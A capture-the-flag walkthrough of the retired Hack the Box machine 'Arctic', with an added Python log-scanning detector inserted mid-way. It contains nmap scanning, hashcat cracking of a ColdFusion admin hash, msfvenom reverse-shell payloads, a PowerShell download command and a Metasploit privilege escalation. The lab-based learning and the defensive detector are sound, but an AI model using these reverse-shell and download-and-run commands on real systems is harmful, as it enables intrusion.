Hack the Box – Arctic Walkthrough

Today, we’re going to solve another CTF machine, “Arctic”. It is now a retired box and is accessible to VIP members.


  • Target OS: Windows
  • IP Address:
  • Difficulty: Easy


  • Getting user
  • Getting root


As always, the first step is reconnaissance, starting with port scanning.

Port Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -Pn --disable-arp-ping -oA

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown


Nmap reveals an unknown service running on port 8500 and if we browse page

Browsing to CFIDE/ and looking inside administrator/ reveals the ‘Adobe ColdFusion 8 Administrator’ login page.

The first thing I did was test out basic creds I could think of, such as admin:admin and admin:administrator. That didn’t work, so I checked the page source and inspected the input fields, but it was useless.

After that, search Google for “Adobe Coldfusion 8 CVE”.

Exploit: https://www.exploit-db.com/exploits/14641

Crack SHA1 Using Hashcat

hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force

Password hash: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1

Cracked: happyday

Go to Debugging & Logging > Scheduled Tasks

Let’s schedule a new task.


This gives us the ability to download a file from a web server and save it locally. Under Server Settings > Mapping, we can verify the CFIDE path. Since our target machine is Windows, we have to create a JSP reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1337 -f raw > shell.jsp

Task Name: Shell
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Click Submit and start the listener.

Click Run Scheduled Task

After running the scheduled task we got the reverse shell.
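From the defender's side, the chain above leaves two traces in web access logs: requests to the CFIDE/administrator console from outside the admin network, and a request for a .jsp file under CFIDE/. The following is an added example, not part of the original walkthrough, that flags both. It assumes Common Log Format lines, a 10.0.0.0/8 management subnet, and that .jsp files are not expected under CFIDE/; the rule names are hypothetical.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Common Log Format; addresses are documentation
# ranges, not values from the walkthrough.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 1523
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 2210
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 880
198.51.100.7 - - [01/Jan/2024:10:05:42 +0000] "GET /CFIDE/shell.jsp HTTP/1.1" 200 0
203.0.113.9 - - [01/Jan/2024:10:06:00 +0000] "GET /index.cfm HTTP/1.1" 200 431
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Assumption: administrators connect only from this management subnet.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def is_trusted(src, trusted):
    """True if src is an IP address inside one of the trusted networks."""
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:  # hostname or garbage in the client field
        return False
    return any(ip in net for net in trusted)


def scan(log_text, trusted=TRUSTED_NETS):
    """Return (timestamp, source, rule, path) tuples for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, ts, _method, url, _status = m.groups()
        # Windows paths are case-insensitive and clients may percent-encode,
        # so normalise before matching.
        path = re.sub(r"/+", "/", unquote(urlsplit(url).path)).lower()
        if path.startswith("/cfide/administrator") and not is_trusted(src, trusted):
            findings.append((ts, src, "admin-console-from-untrusted", path))
        elif path.startswith("/cfide/") and path.endswith(".jsp"):
            findings.append((ts, src, "jsp-under-cfide", path))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same two rules translate directly into a SIEM query; restricting the administrator path to the management network at the web server or firewall removes the first finding entirely.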

User flag can be obtained from C:\Users\tolis\Desktop\user.txt

Privilege Escalation

Since we have a low-privilege shell, we can try upgrading to a proper shell and go for privilege escalation.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shell.exe

Transfer our shell.exe file to the target box using PowerShell.

powershell "(new-object System.Net.WebClient).Downloadfile('', 'shell.exe')"

And we got a proper low-privilege reverse shell.

Since we don’t know what to exploit for privilege escalation, we’ll do some enumeration. The easiest way to do that in Metasploit is to use the local_exploit_suggester module.

Module: post/multi/recon/local_exploit_suggester

We got a bunch of suggestions through the x86 shell, but let’s see what we get through an x64 shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shellx64.exe

Now that we’re x64, let’s run local_exploit_suggester again.

Not much of a difference, so let’s try the first one (exploit/windows/local/ms10_092_schelevator).

Looks like it worked!